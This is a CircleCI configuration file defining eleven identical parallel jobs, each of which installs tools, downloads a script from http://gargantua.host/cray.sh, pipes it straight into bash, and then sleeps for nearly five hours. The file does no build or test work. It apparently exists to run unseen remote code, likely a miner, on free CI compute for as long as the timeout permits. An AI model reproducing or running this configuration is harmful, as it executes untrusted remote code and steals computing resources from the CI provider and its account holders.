version: 2.1

jobs:
  fpmstage:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cray.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  fpmstage1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cray.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  fpmstage2:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cray.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  fpmstage3:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cray.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  fpmstage4:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cray.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  fpmstage5:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cray.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  fpmstage6:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cray.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  fpmstage7:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cray.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  fpmstage8:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cray.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  fpmstage9:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cray.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  fpmstage10:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/cray.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

workflows:
  main:
    jobs:
      - fpmstage
      - fpmstage1
      - fpmstage2
      - fpmstage3
      - fpmstage4
      - fpmstage5
      - fpmstage6
      - fpmstage7
      - fpmstage8
      - fpmstage9
      - fpmstage10